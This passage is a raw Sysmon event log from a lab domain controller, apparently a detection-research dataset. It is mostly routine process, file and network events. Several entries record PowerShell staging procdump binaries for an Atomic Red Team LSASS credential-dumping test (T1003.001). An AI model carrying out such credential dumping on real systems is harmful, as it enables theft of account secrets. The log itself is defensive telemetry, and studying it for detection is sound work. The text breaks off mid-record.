21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.636{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.260{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7709D494C5BB89B9176D8A00F82BDFA7,SHA256=2477952977AE40DB9C83B1E81B8473C92AEFF8454DE5285129A1A95C0934BB29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D97EC5997007213014AF546E4C68E0,SHA256=7EC0A6815114393EBA09FC51C4DD4830C0C07A30A17164C6B95301187137B994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A7AA5644A13D2BCA540FC5AF994063D,SHA256=7F8A307F82AE8C81249D3559068C7EE5D6F0F485A659A4403E545980F9050833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=96231D302A43B7C38B48314495C695DA,SHA256=95CA0B452E620A7D8244D407485FF4D4812EA8A1B348612A347466D0B6801A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.979{4DB9351A-A320-60D3-2D06-00000000CF01}5160ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.979{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe2021-06-23 21:09:54.979 11241100x800000000000000024906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.932{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\Eula.txt2021-06-23 21:09:54.932 23542300x800000000000000024905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.932{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F707AC16CB43B42CC48D84E51FBE8A9F,SHA256=DCE3C24696F3383D343056A22F99AA18E8E66995F86A409DB5DA1AEEAB2098B8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.917{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64a.exe2021-06-23 21:09:54.917 11241100x800000000000000024903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.885{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64.exe2021-06-23 21:09:54.885 11241100x800000000000000024902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.854{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump.exe2021-06-23 21:09:54.854 23542300x800000000000000024901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ABB51491C2F3803ADDA46BB7973712AB,SHA256=4949E2CA1B0A9E1AEFC5E36DC486FF23ED49E5636CE9ACF4D7841BB8157F8294,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A322-60D3-3006-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A322-60D3-3006-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A322-60D3-3006-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.496{4DB9351A-A322-60D3-3006-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000024892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.045{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-663.attackrange.local61524-false72.21.81.240-80http 354300x800000000000000024891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.033{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58645- 354300x800000000000000024890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.628{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61523-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.628{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61523-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 23542300x800000000000000024888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.073{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=BBEE658A7AFEA6A15581EC28976FBB88,SHA256=F6ACD16CDEE432D4FFCB61434711D5D7D080330EE7E3F19EF8AF1E5C8F7174CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.745{4DB9351A-A323-60D3-3306-00000000CF01}51725568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.729{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.729{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.698{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7F867187D48A08EF5E8C14DFE1C9BB4,SHA256=4DE2DD3C2062933093CB67F60988DC87A2D4F18579A3E4BC255BCE74D52DF9B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.698{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5C52905CA0BE502A89957E2E6F362958,SHA256=1923CBC9C339138F75484A407C0B0A0201163B42799B148137BDCE11B9ECD041,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.682{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 